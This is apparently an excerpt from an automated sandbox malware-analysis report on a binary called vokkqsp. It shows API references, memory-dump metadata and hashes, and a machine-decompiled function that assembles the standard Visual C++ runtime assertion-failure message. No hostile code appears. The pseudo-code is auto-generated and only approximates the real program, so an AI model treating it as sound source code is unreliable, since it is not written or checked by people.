                                                      0x0040c47e
                                                      0x0040c467
                                                      0x0040c454
                                                      0x0040c43d
                                                      0x0040c425
                                                      0x0040c40e
                                                      0x0040c3ee
                                                      0x0040c3ab
                                                      0x0040c394
                                                      0x0040c37d
                                                      0x0040c331
                                                      0x0040c31a
                                                      0x0040c303
                                                      0x0040c292
                                                      0x0040c27b
                                                      0x0040c262
                                                      0x0040c25d
                                                      0x0040c1e4
                                                      0x0040c1ba
                                                      0x0040c1a3
                                                      0x0040c150
                                                      0x0040c150
                                                      0x0040c163
                                                      0x0040c16b
                                                      0x0040c16f
                                                      0x0040c174
                                                      0x0040c179
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c179
                                                      0x0040c10d
                                                      0x0040c11a
                                                      0x0040c11f
                                                      0x0040c124
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040c124
                                                      0x0040c10b
                                                      0x0040c0b2
                                                      0x0040c09b

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C0DF
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C103
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Module$FileHandleName
                                                      • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                                                      • API String ID: 4146042529-3261600717
                                                      • Opcode ID: cae46870eb9739d6ca4910d6817c9eacb589348dc13bb38fcfab888b03916797
                                                      • Instruction ID: cbb270ca924a52a3a7ff405233c51d513effd9822ff967e1a383477985de6f7a
                                                      • Opcode Fuzzy Hash: cae46870eb9739d6ca4910d6817c9eacb589348dc13bb38fcfab888b03916797
                                                      • Instruction Fuzzy Hash: 4AC10834A00129B7EB306F259DC6FEB36689F94704F6405BBFC05F6281F678EA41855D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040BC17 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 363COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0040BC17(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, WCHAR* _a16, intOrPtr _a20, WCHAR* _a24) {
				char _v0;
				char _v4;
				signed int _v8;
				char _v11;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v272;
				WCHAR* _v276;
				WCHAR* _v280;
				signed int _v284;
				intOrPtr* _v288;
				char* _v296;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr* _v316;
				signed int _v328;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				WCHAR* _v548;
				signed int _v552;
				intOrPtr* _v556;
				WCHAR* _v560;
				intOrPtr _v856;
				signed int _v860;
				intOrPtr _v872;
				intOrPtr _v908;
				intOrPtr* _v912;
				intOrPtr* _v916;
				void* _v920;
				intOrPtr* _v924;
				intOrPtr* _v928;
				char _v932;
				void* __ebp;
				signed int _t154;
				void* _t158;
				signed int _t161;
				WCHAR* _t165;
				WCHAR* _t170;
				void* _t182;
				WCHAR* _t184;
				void* _t202;
				void* _t204;
				WCHAR* _t206;
				WCHAR* _t207;
				signed int _t211;
				struct HINSTANCE__* _t213;
				WCHAR* _t214;
				char _t215;
				WCHAR* _t217;
				WCHAR* _t218;
				WCHAR* _t219;
				void* _t220;
				WCHAR* _t222;
				WCHAR* _t223;
				WCHAR* _t224;
				WCHAR* _t225;
				intOrPtr _t226;
				WCHAR* _t230;
				WCHAR* _t231;
				WCHAR* _t232;
				WCHAR* _t233;
				intOrPtr _t234;
				WCHAR* _t236;
				WCHAR* _t237;
				WCHAR* _t238;
				WCHAR* _t239;
				WCHAR* _t240;
				WCHAR* _t245;
				void* _t246;
				signed int _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t251;
				WCHAR* _t254;
				WCHAR* _t255;
				void* _t258;
				void* _t259;
				WCHAR* _t261;
				WCHAR* _t262;
				void* _t264;
				WCHAR* _t266;
				WCHAR* _t267;
				signed int _t269;
				void* _t270;
				WCHAR* _t271;
				WCHAR* _t273;
				void* _t274;
				void* _t275;
				signed int _t278;
				void* _t281;
				intOrPtr _t283;
				void* _t285;
				void* _t286;
				void* _t287;
				short _t288;
				void* _t290;
				void* _t291;
				void* _t292;
				intOrPtr _t293;
				intOrPtr _t294;
				void* _t298;
				void* _t299;
				void* _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t307;
				void* _t308;
				void* _t313;
				short _t314;
				intOrPtr _t315;
				void* _t316;
				void* _t317;
				void* _t321;
				void* _t322;
				void* _t326;
				WCHAR* _t328;
				WCHAR* _t329;
				void* _t332;
				void* _t334;
				WCHAR* _t336;
				char* _t337;
				signed int _t341;
				WCHAR* _t346;
				void* _t349;
				char* _t352;
				signed int _t354;
				intOrPtr* _t356;
				signed int _t357;
				intOrPtr* _t358;
				signed int _t359;
				intOrPtr* _t361;
				void* _t365;
				intOrPtr* _t368;
				WCHAR* _t369;
				intOrPtr* _t370;
				intOrPtr* _t371;
				intOrPtr* _t373;
				short* _t376;
				void* _t379;
				intOrPtr* _t380;
				void* _t382;
				signed int _t383;
				void* _t384;
				intOrPtr* _t385;
				void* _t386;
				WCHAR* _t387;
				WCHAR* _t388;
				intOrPtr _t390;
				intOrPtr _t391;
				signed short* _t394;
				intOrPtr* _t397;
				intOrPtr* _t399;
				intOrPtr* _t400;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t406;
				void* _t408;
				signed int _t409;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t416;
				void* _t418;

				_t378 = __edx;
				_t154 =  *0x44b018; // 0x1989d38f
				_v8 = _t154 ^ _t403;
				_t336 = _a16;
				_t399 = _a4;
				_t390 = _a8;
				_v288 = _a12;
				_v276 = _a24;
				_t158 = E0041080E(_t399, _t390, "Assertion failed!");
				_t409 = _t408 + 0xc;
				if(_t158 != 0) {
					L62:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0041F197();
					asm("int3");
					_push(_t403);
					_t404 = _t409;
					_t161 =  *0x44b018; // 0x1989d38f
					_v328 = _t161 ^ _t404;
					_push(_t336);
					_t337 = _v296;
					_push(_t399);
					_t400 = _v316;
					_push(_t390);
					_t391 = _v312;
					_v872 = _v308;
					_v856 = _v304;
					_t165 = E00422A82(_t400, _t391, L"Assertion failed!");
					_v860 = _v860 & 0x00000000;
					_t411 = _t409 - 0x228 + 0xc;
					__eflags = _t165;
					if(_t165 != 0) {
						L127:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0041F197();
						asm("int3");
						_push(_t404);
						_t405 = _t411;
						_push(_t346);
						_push(_t346);
						_t349 = E0041519A( &_v920, E0041F307(2));
						_t170 = E0040B665(_t349);
						__eflags = _t170;
						if(_t170 == 0) {
							_push(0);
							_push(4);
							_t204 = E0041F307(2);
							_t349 = 0;
							_push(_t204);
							E004233D1(_t378);
							_t411 = _t411 + 0x10;
						}
						_push(0);
						_v16 = E0040C8FE();
						_v20 = E0041F307(2);
						_push( &_a4);
						_push( &_v0);
						_push( &_v4);
						L134();
						E00421D48(_t349, _t378, E0041F307(2));
						_t412 = _t411 + 0x24;
						E00410889(_t337, _t349, _t378, _t391, _t400,  &_v20,  &_v16);
						asm("int3");
						_push(_t405);
						_t406 = _t412;
						_push(_t349);
						_push(_t349);
						E0040C84F(_t337, _t391, _t400, _v916, _v912, _v908);
						_t182 = E0041F307(2);
						_t413 = _t412 + 0x10;
						_t351 = E0041519A( &_v932, _t182);
						_t184 = E0040B665(_t183);
						__eflags = _t184;
						if(_t184 == 0) {
							_push(0);
							_push(4);
							_t202 = E0041F307(2);
							_t351 = 0;
							_push(_t202);
							E004233D1(_t378);
							_t413 = _t413 + 0x10;
						}
						_push(0);
						_v20 = E0040C904();
						_v24 = E0041F307(2);
						E0040C64D( &_v24,  &_v20,  &_v8,  &_v4,  &_v0);
						E00421D48(_t351, _t378, E0041F307(2));
						E00410889(_t337, _t351, _t378, _t391, _t400);
						asm("int3");
						_push(_t406);
						_push( *_v912);
						_push( *_v916);
						return E0040CAC5( *_v928,  *_v924,  *_v920);
					} else {
						_push(L"\n\n");
						_push(_t391);
						_t206 = E00422A13(_t400);
						_t411 = _t411 + 0xc;
						__eflags = _t206;
						if(_t206 != 0) {
							goto L127;
						} else {
							_push(L"Program: ");
							_push(_t391);
							_t207 = E00422A13(_t400);
							_t411 = _t411 + 0xc;
							__eflags = _t207;
							if(_t207 != 0) {
								goto L127;
							} else {
								E00403D00(_t391,  &_v536, _t207, 0x20a);
								_t416 = _t411 + 0xc;
								_v552 = 0;
								_t211 =  &_v552;
								__imp__GetModuleHandleExW(6, _t337, _t211);
								_t346 =  &_v536;
								_t337 = 0x105;
								asm("sbb eax, eax");
								_t213 =  ~_t211 & _v552;
								_v552 = _t213;
								_t214 = GetModuleFileNameW(_t213, _t346, 0x105);
								__eflags = _t214;
								if(_t214 != 0) {
									L68:
									_t337 =  &_v536;
									_t352 = _t337;
									_t378 =  &(_t352[2]);
									do {
										_t215 =  *_t352;
										_t352 =  &(_t352[2]);
										__eflags = _t215 - _v544;
									} while (_t215 != _v544);
									_t346 = _t352 - _t378 >> 1;
									__eflags =  &(_t346[5]) - 0x40;
									if( &(_t346[5]) <= 0x40) {
										L72:
										_push(_t337);
										_push(_t391);
										_t217 = E00422A13(_t400);
										_t411 = _t416 + 0xc;
										__eflags = _t217;
										if(_t217 != 0) {
											goto L127;
										} else {
											_push("\n");
											_push(_t391);
											_t218 = E00422A13(_t400);
											_t411 = _t411 + 0xc;
											__eflags = _t218;
											if(_t218 != 0) {
												goto L127;
											} else {
												_push(L"File: ");
												_push(_t391);
												_t219 = E00422A13(_t400);
												_t411 = _t411 + 0xc;
												__eflags = _t219;
												if(_t219 != 0) {
													goto L127;
												} else {
													_t378 = _v540;
													_t354 = _t378;
													_t337 = _t354 + 2;
													do {
														_t220 =  *_t354;
														_t354 = _t354 + 2;
														__eflags = _t220 - _v544;
													} while (_t220 != _v544);
													_t346 = _t354 - _t337 >> 1;
													__eflags =  &(_t346[4]) - 0x40;
													if( &(_t346[4]) <= 0x40) {
														_push(_t378);
														goto L96;
													} else {
														_t341 = _t378;
														_t365 = _t341 + 2;
														do {
															_t246 =  *_t341;
															_t341 = _t341 + 2;
															__eflags = _t246 - _v544;
														} while (_t246 != _v544);
														_v548 = 0x5c;
														_t337 = _t341 - _t365 >> 1;
														_t346 = 1;
														_t247 =  *(_t378 + _t337 * 2 - 2) & 0x0000ffff;
														__eflags = _t247 - _v548;
														if(_t247 != _v548) {
															_v560 = _t247;
															_t394 = _t378 - 2 + _t337 * 2;
															_t383 = _t247;
															while(1) {
																__eflags = _t383 - 0x2f;
																if(_t383 == 0x2f) {
																	break;
																}
																__eflags = _t346 - _t337;
																if(_t346 < _t337) {
																	_t394 = _t394 - 2;
																	_t346 =  &(_t346[0]);
																	_t269 =  *_t394 & 0x0000ffff;
																	_t383 = _t269;
																	__eflags = _t269 - _v548;
																	if(_t269 != _v548) {
																		continue;
																	}
																}
																break;
															}
															_t391 = _a4;
															_t378 = _v540;
														}
														_t249 = _t337 - _t346;
														_v548 = _t249;
														__eflags = _t249 - 0x26;
														if(__eflags <= 0) {
															if(__eflags >= 0) {
																goto L119;
															} else {
																_t259 = 0x35;
																_t346 = _t346 >> 1;
																_v560 = _t346;
																_push(_t259 - _t346);
																_t261 = E00422BD3(_t346, _t400, _t391, _t378);
																_t411 = _t411 + 0x10;
																__eflags = _t261;
																if(_t261 != 0) {
																	goto L127;
																} else {
																	_push(L"...");
																	_push(_t391);
																	_t262 = E00422A13(_t400);
																	_t411 = _t411 + 0xc;
																	__eflags = _t262;
																	if(_t262 != 0) {
																		goto L127;
																	} else {
																		_t337 = _t337 - _v560;
																		__eflags = _t337;
																		_t258 = _v540 + _t337 * 2;
																		goto L95;
																	}
																}
															}
														} else {
															__eflags = _t346 - 0x12;
															if(_t346 >= 0x12) {
																L119:
																_push(0x23);
																_t250 = E00422BD3(_t346, _t400, _t391, _t378);
																_t411 = _t411 + 0x10;
																__eflags = _t250;
																if(_t250 != 0) {
																	goto L127;
																} else {
																	_push(L"...");
																	_push(_t391);
																	_t251 = E00422A13(_t400);
																	_t411 = _t411 + 0xc;
																	__eflags = _t251;
																	if(_t251 != 0) {
																		goto L127;
																	} else {
																		_t346 = _v548;
																		_push(8);
																		_t254 = E00422BD3(_t346, _t400, _t391, _v540 + _t346 * 2);
																		_t411 = _t411 + 0x10;
																		__eflags = _t254;
																		if(_t254 != 0) {
																			goto L127;
																		} else {
																			_push(L"...");
																			_push(_t391);
																			_t255 = E00422A13(_t400);
																			_t411 = _t411 + 0xc;
																			__eflags = _t255;
																			if(_t255 != 0) {
																				goto L127;
																			} else {
																				_t258 = _v540 + _t337 * 2 + 0xfffffff2;
																				goto L95;
																			}
																		}
																	}
																}
															} else {
																_t264 = 0x35;
																_push(_t264 - _t346);
																_t266 = E00422BD3(_t346, _t400, _t391, _t378);
																_t411 = _t411 + 0x10;
																__eflags = _t266;
																if(_t266 != 0) {
																	goto L127;
																} else {
																	_push(L"...");
																	_push(_t391);
																	_t267 = E00422A13(_t400);
																	_t411 = _t411 + 0xc;
																	__eflags = _t267;
																	if(_t267 != 0) {
																		goto L127;
																	} else {
																		_t346 = _v548;
																		_t258 = _v540 + _t346 * 2;
																		L95:
																		_push(_t258);
																		L96:
																		_push(_t391);
																		_t222 = E00422A13(_t400);
																		_t411 = _t411 + 0xc;
																		__eflags = _t222;
																		if(_t222 != 0) {
																			goto L127;
																		} else {
																			_push("\n");
																			_push(_t391);
																			_t223 = E00422A13(_t400);
																			_t411 = _t411 + 0xc;
																			__eflags = _t223;
																			if(_t223 != 0) {
																				goto L127;
																			} else {
																				_push(L"Line: ");
																				_push(_t391);
																				_t224 = E00422A13(_t400);
																				_t411 = _t411 + 0xc;
																				__eflags = _t224;
																				if(_t224 != 0) {
																					goto L127;
																				} else {
																					_t356 = _t400;
																					__eflags = 0;
																					_t379 = _t356 + 2;
																					do {
																						_t225 =  *_t356;
																						_t356 = _t356 + 2;
																						__eflags = _t225;
																					} while (_t225 != 0);
																					_t357 = _t356 - _t379;
																					__eflags = _t357;
																					_t380 = _t400;
																					_t346 = _t357 >> 1;
																					_t337 = _t380 + 2;
																					do {
																						_t226 =  *_t380;
																						_t380 = _t380 + 2;
																						__eflags = _t226 - _v544;
																					} while (_t226 != _v544);
																					_t378 = _t380 - _t337 >> 1;
																					_t230 = E00422790(_t346, _a16, _t400 + (_t380 - _t337 >> 1) * 2, _t391 - _t346, 0xa);
																					_t411 = _t411 + 0x10;
																					__eflags = _t230;
																					if(_t230 != 0) {
																						goto L127;
																					} else {
																						_push(L"\n\n");
																						_push(_t391);
																						_t231 = E00422A13(_t400);
																						_t411 = _t411 + 0xc;
																						__eflags = _t231;
																						if(_t231 != 0) {
																							goto L127;
																						} else {
																							_push(L"Expression: ");
																							_push(_t391);
																							_t232 = E00422A13(_t400);
																							_t411 = _t411 + 0xc;
																							__eflags = _t232;
																							if(_t232 != 0) {
																								goto L127;
																							} else {
																								_t358 = _t400;
																								__eflags = 0;
																								_t382 = _t358 + 2;
																								do {
																									_t233 =  *_t358;
																									_t358 = _t358 + 2;
																									__eflags = _t233;
																								} while (_t233 != 0);
																								_t359 = _t358 - _t382;
																								__eflags = _t359;
																								_t378 = (_t359 >> 1) + 0xb0;
																								_t361 = _v556;
																								_t337 = _t361 + 2;
																								do {
																									_t234 =  *_t361;
																									_t361 = _t361 + 2;
																									__eflags = _t234 - _v544;
																								} while (_t234 != _v544);
																								_t346 = _t361 - _t337 >> 1;
																								__eflags = _t346 + _t378 - _t391;
																								if(_t346 + _t378 <= _t391) {
																									_push(_v556);
																									goto L113;
																								} else {
																									_push(_t391 - _t378 - 3);
																									_t245 = E00422BD3(_t346, _t400, _t391, _v556);
																									_t411 = _t411 + 0x10;
																									__eflags = _t245;
																									if(_t245 != 0) {
																										goto L127;
																									} else {
																										_push(L"...");
																										L113:
																										_push(_t391);
																										_t236 = E00422A13(_t400);
																										_t411 = _t411 + 0xc;
																										__eflags = _t236;
																										if(_t236 != 0) {
																											goto L127;
																										} else {
																											_t337 = L"\n\n";
																											_push(_t337);
																											_push(_t391);
																											_t237 = E00422A13(_t400);
																											_t411 = _t411 + 0xc;
																											__eflags = _t237;
																											if(_t237 != 0) {
																												goto L127;
																											} else {
																												_push(L"For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																												_push(_t391);
																												_t238 = E00422A13(_t400);
																												_t411 = _t411 + 0xc;
																												__eflags = _t238;
																												if(_t238 != 0) {
																													goto L127;
																												} else {
																													_push(_t337);
																													_push(_t391);
																													_t239 = E00422A13(_t400);
																													_t411 = _t411 + 0xc;
																													__eflags = _t239;
																													if(_t239 != 0) {
																														goto L127;
																													} else {
																														_push(L"(Press Retry to debug the application - JIT must be enabled)");
																														_push(_t391);
																														_t240 = E00422A13(_t400);
																														_t411 = _t411 + 0xc;
																														__eflags = _t240;
																														if(_t240 != 0) {
																															goto L127;
																														} else {
																															__eflags = _v12 ^ _t404;
																															return E0040361D(_v12 ^ _t404);
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t270 = _t346 * 2 - 0x6a;
										_t346 = 0x20a - _t270;
										_t337 =  &_v536 + _t270;
										_t271 = E00434658(_t337, _t346, L"...", 6);
										_t411 = _t416 + 0x10;
										__eflags = _t271;
										if(_t271 != 0) {
											goto L127;
										} else {
											goto L72;
										}
									}
								} else {
									_t273 = E00422A82( &_v536, 0x105, L"<program name unknown>");
									_t411 = _t416 + 0xc;
									__eflags = _t273;
									if(_t273 != 0) {
										goto L127;
									} else {
										goto L68;
									}
								}
							}
						}
					}
				} else {
					_t274 = E00422C49(_t399, _t390, "\n\n");
					_t409 = _t409 + 0xc;
					if(_t274 != 0) {
						goto L62;
					} else {
						_t275 = E00422C49(_t399, _t390, "Program: ");
						_t409 = _t409 + 0xc;
						if(_t275 != 0) {
							goto L62;
						} else {
							E00403D00(_t390,  &_v272, _t275, 0x105);
							_v284 = _v284 & 0x00000000;
							_t278 =  &_v284;
							__imp__GetModuleHandleExW(6, _v276, _t278);
							_t346 =  &_v272;
							asm("sbb eax, eax");
							_v284 =  ~_t278 & _v284;
							_t281 = E00422FD2(_t378,  ~_t278 & _v284, _t346, 0x105);
							_t418 = _t409 + 0x18;
							if(_t281 != 0) {
								L5:
								_t378 =  &_v272;
								_t368 =  &_v272;
								_v276 = _t368 + 1;
								do {
									_t283 =  *_t368;
									_t368 = _t368 + 1;
								} while (_t283 != 0);
								_t346 = _t368 - _v276;
								if( &(_t346[5]) <= 0x40) {
									L10:
									_t285 = E00422C49(_t399, _t390, _t378);
									_t409 = _t418 + 0xc;
									if(_t285 != 0) {
										goto L62;
									} else {
										_t286 = E00422C49(_t399, _t390, "\n");
										_t409 = _t409 + 0xc;
										if(_t286 != 0) {
											goto L62;
										} else {
											_t287 = E00422C49(_t399, _t390, "File: ");
											_t409 = _t409 + 0xc;
											if(_t287 != 0) {
												goto L62;
											} else {
												_t369 = _t336;
												_t28 =  &(_t369[0]); // 0x1
												_t378 = _t28;
												do {
													_t288 =  *_t369;
													_t369 =  &(_t369[0]);
												} while (_t288 != 0);
												_t346 = _t369 - _t378;
												_t29 =  &(_t346[4]); // 0x9
												if(_t29 <= 0x40) {
													L36:
													_push(_t336);
													goto L37;
												} else {
													_t387 = _t336;
													_t30 =  &(_t387[0]); // 0x1
													_t376 = _t30;
													do {
														_t314 =  *_t387;
														_t387 =  &(_t387[0]);
													} while (_t314 != 0);
													_t388 = _t387 - _t376;
													_t346 = 1;
													_v276 = _t388;
													_v280 = 1;
													_t315 =  *((intOrPtr*)(_t336 + _t388 - 1));
													if(_t315 != 0x5c) {
														_t35 = _t336 - 1; // -1
														_t397 = _t35 + _t388;
														while(_t315 != 0x2f && _t346 < _t388) {
															_t346 =  &(_t346[0]);
															_t397 = _t397 - 1;
															_t315 =  *_t397;
															if(_t315 != 0x5c) {
																continue;
															}
															break;
														}
														_t390 = _a8;
														_v280 = _t346;
													}
													_t378 = _t388 - _t346;
													if(_t388 - _t346 <= 0x26) {
														if(__eflags >= 0) {
															goto L26;
														} else {
															_t346 = _t346 >> 1;
															__eflags = _t346;
															_v280 = _t346;
															goto L33;
														}
													} else {
														if(_t346 < 0x12) {
															L33:
															_t326 = 0x35;
															_push(_t326 - _t346);
															_t328 = E00422D84(_t346, _t399, _t390, _t336);
															_t409 = _t409 + 0x10;
															__eflags = _t328;
															if(_t328 != 0) {
																goto L62;
															} else {
																_t329 = E00422C49(_t399, _t390, "...");
																_t409 = _t409 + 0xc;
																__eflags = _t329;
																if(_t329 != 0) {
																	goto L62;
																} else {
																	_t336 = _t336 - _v280 + _v276;
																	__eflags = _t336;
																	goto L36;
																}
															}
														} else {
															L26:
															_push(0x23);
															_t316 = E00422D84(_t346, _t399, _t390, _t336);
															_t409 = _t409 + 0x10;
															if(_t316 != 0) {
																goto L62;
															} else {
																_t317 = E00422C49(_t399, _t390, "...");
																_t409 = _t409 + 0xc;
																if(_t317 != 0) {
																	goto L62;
																} else {
																	_push(8);
																	_t321 = E00422D84(_t346, _t399, _t390, _t336 - _v280 + _v276);
																	_t409 = _t409 + 0x10;
																	if(_t321 != 0) {
																		goto L62;
																	} else {
																		_t322 = E00422C49(_t399, _t390, "...");
																		_t409 = _t409 + 0xc;
																		if(_t322 != 0) {
																			goto L62;
																		} else {
																			_push( &(_v276[0xfffffffffffffffd]) + _t336);
																			L37:
																			_push(_t390);
																			_push(_t399);
																			_t290 = E00422C49();
																			_t409 = _t409 + 0xc;
																			if(_t290 != 0) {
																				goto L62;
																			} else {
																				_t291 = E00422C49(_t399, _t390, "\n");
																				_t409 = _t409 + 0xc;
																				if(_t291 != 0) {
																					goto L62;
																				} else {
																					_t292 = E00422C49(_t399, _t390, "Line: ");
																					_t409 = _t409 + 0xc;
																					if(_t292 != 0) {
																						goto L62;
																					} else {
																						_t370 = _t399;
																						_t384 = _t370 + 1;
																						do {
																							_t293 =  *_t370;
																							_t370 = _t370 + 1;
																						} while (_t293 != 0);
																						_t346 = _t370 - _t384;
																						_t385 = _t399;
																						_t336 = _t385 + 1;
																						do {
																							_t294 =  *_t385;
																							_t385 = _t385 + 1;
																						} while (_t294 != 0);
																						_t378 = _t385 - _t336;
																						_t298 = E004227F8(_t346, _a20, _t399 + _t385 - _t336, _t390 - _t346, 0xa);
																						_t409 = _t409 + 0x10;
																						if(_t298 != 0) {
																							goto L62;
																						} else {
																							_t299 = E00422C49(_t399, _t390, "\n\n");
																							_t409 = _t409 + 0xc;
																							if(_t299 != 0) {
																								goto L62;
																							} else {
																								_t300 = E00422C49(_t399, _t390, "Expression: ");
																								_t409 = _t409 + 0xc;
																								if(_t300 != 0) {
																									goto L62;
																								} else {
																									_t371 = _t399;
																									_t386 = _t371 + 1;
																									do {
																										_t301 =  *_t371;
																										_t371 = _t371 + 1;
																									} while (_t301 != 0);
																									_t378 = _t371 - _t386 + 0xb0;
																									_t373 = _v288;
																									_t336 = _t373 + 1;
																									do {
																										_t302 =  *_t373;
																										_t373 = _t373 + 1;
																									} while (_t302 != 0);
																									_t346 = _t373 - _t336;
																									if(_t346 + _t378 <= _t390) {
																										_push(_v288);
																										goto L54;
																									} else {
																										_push(_t390 - _t378 - 3);
																										_t313 = E00422D84(_t346, _t399, _t390, _v288);
																										_t409 = _t409 + 0x10;
																										if(_t313 != 0) {
																											goto L62;
																										} else {
																											_push("...");
																											L54:
																											_push(_t390);
																											_push(_t399);
																											_t304 = E00422C49();
																											_t409 = _t409 + 0xc;
																											if(_t304 != 0) {
																												goto L62;
																											} else {
																												_t336 = "\n\n";
																												_t305 = E00422C49(_t399, _t390, _t336);
																												_t409 = _t409 + 0xc;
																												if(_t305 != 0) {
																													goto L62;
																												} else {
																													_t306 = E00422C49(_t399, _t390, "For information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts");
																													_t409 = _t409 + 0xc;
																													if(_t306 != 0) {
																														goto L62;
																													} else {
																														_t307 = E00422C49(_t399, _t390, _t336);
																														_t409 = _t409 + 0xc;
																														if(_t307 != 0) {
																															goto L62;
																														} else {
																															_t308 = E00422C49(_t399, _t390, "(Press Retry to debug the application - JIT must be enabled)");
																															_t409 = _t409 + 0xc;
																															if(_t308 != 0) {
																																goto L62;
																															} else {
																																return E0040361D(_v8 ^ _t403);
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t346 = _t403 + _t346 - 0x141;
									_v276 = _t346;
									_t332 = E00434658(_t346,  &_v11 - _t346, "...", 3);
									_t409 = _t418 + 0x10;
									if(_t332 != 0) {
										goto L62;
									} else {
										_t378 = _v276;
										goto L10;
									}
								}
							} else {
								_t334 = E0041080E( &_v272, 0x105, "<program name unknown>");
								_t409 = _t418 + 0xc;
								if(_t334 != 0) {
									goto L62;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}














































































































































































                                                      0x0040bc17
                                                      0x0040bc22
                                                      0x0040bc29
                                                      0x0040bc30
                                                      0x0040bc34
                                                      0x0040bc38
                                                      0x0040bc40
                                                      0x0040bc4b
                                                      0x0040bc51
                                                      0x0040bc56
                                                      0x0040bc5b
                                                      0x0040c02c
                                                      0x0040c02e
                                                      0x0040c02f
                                                      0x0040c030
                                                      0x0040c031
                                                      0x0040c032
                                                      0x0040c033
                                                      0x0040c038
                                                      0x0040c03b
                                                      0x0040c03c
                                                      0x0040c044
                                                      0x0040c04b
                                                      0x0040c051
                                                      0x0040c052
                                                      0x0040c055
                                                      0x0040c056
                                                      0x0040c059
                                                      0x0040c05a
                                                      0x0040c062
                                                      0x0040c06d
                                                      0x0040c073
                                                      0x0040c078
                                                      0x0040c07f
                                                      0x0040c082
                                                      0x0040c084
                                                      0x0040c50e
                                                      0x0040c510
                                                      0x0040c511
                                                      0x0040c512
                                                      0x0040c513
                                                      0x0040c514
                                                      0x0040c515
                                                      0x0040c51a
                                                      0x0040c51d
                                                      0x0040c51e
                                                      0x0040c520
                                                      0x0040c521
                                                      0x0040c533
                                                      0x0040c535
                                                      0x0040c53a
                                                      0x0040c53c
                                                      0x0040c53e
                                                      0x0040c540
                                                      0x0040c546
                                                      0x0040c54b
                                                      0x0040c54c
                                                      0x0040c54d
                                                      0x0040c552
                                                      0x0040c552
                                                      0x0040c555
                                                      0x0040c55e
                                                      0x0040c566
                                                      0x0040c56c
                                                      0x0040c570
                                                      0x0040c574
                                                      0x0040c57d
                                                      0x0040c58a
                                                      0x0040c58f
                                                      0x0040c592
                                                      0x0040c597
                                                      0x0040c59a
                                                      0x0040c59b
                                                      0x0040c59d
                                                      0x0040c59e
                                                      0x0040c5a8
                                                      0x0040c5af
                                                      0x0040c5b4
                                                      0x0040c5c0
                                                      0x0040c5c2
                                                      0x0040c5c7
                                                      0x0040c5c9
                                                      0x0040c5cb
                                                      0x0040c5cd
                                                      0x0040c5d3
                                                      0x0040c5d8
                                                      0x0040c5d9
                                                      0x0040c5da
                                                      0x0040c5df
                                                      0x0040c5df
                                                      0x0040c5e2
                                                      0x0040c5eb
                                                      0x0040c5f3
                                                      0x0040c60a
                                                      0x0040c617
                                                      0x0040c61f
                                                      0x0040c624
                                                      0x0040c627
                                                      0x0040c62d
                                                      0x0040c632
                                                      0x0040c64c
                                                      0x0040c08a
                                                      0x0040c08a
                                                      0x0040c08f
                                                      0x0040c091
                                                      0x0040c096
                                                      0x0040c099
                                                      0x0040c09b
                                                      0x00000000
                                                      0x0040c0a1
                                                      0x0040c0a1
                                                      0x0040c0a6
                                                      0x0040c0a8
                                                      0x0040c0ad
                                                      0x0040c0b0
                                                      0x0040c0b2
                                                      0x00000000
                                                      0x0040c0b8
                                                      0x0040c0c5
                                                      0x0040c0ca
                                                      0x0040c0cf
                                                      0x0040c0d5
                                                      0x0040c0df
                                                      0x0040c0e7
                                                      0x0040c0ed
                                                      0x0040c0f3
                                                      0x0040c0f5
                                                      0x0040c0fd
                                                      0x0040c103
                                                      0x0040c109
                                                      0x0040c10b
                                                      0x0040c12a
                                                      0x0040c12a
                                                      0x0040c130
                                                      0x0040c132
                                                      0x0040c135
                                                      0x0040c135
                                                      0x0040c138
                                                      0x0040c13b
                                                      0x0040c13b
                                                      0x0040c146
                                                      0x0040c14b
                                                      0x0040c14e
                                                      0x0040c17f
                                                      0x0040c17f
                                                      0x0040c180
                                                      0x0040c182
                                                      0x0040c187
                                                      0x0040c18a
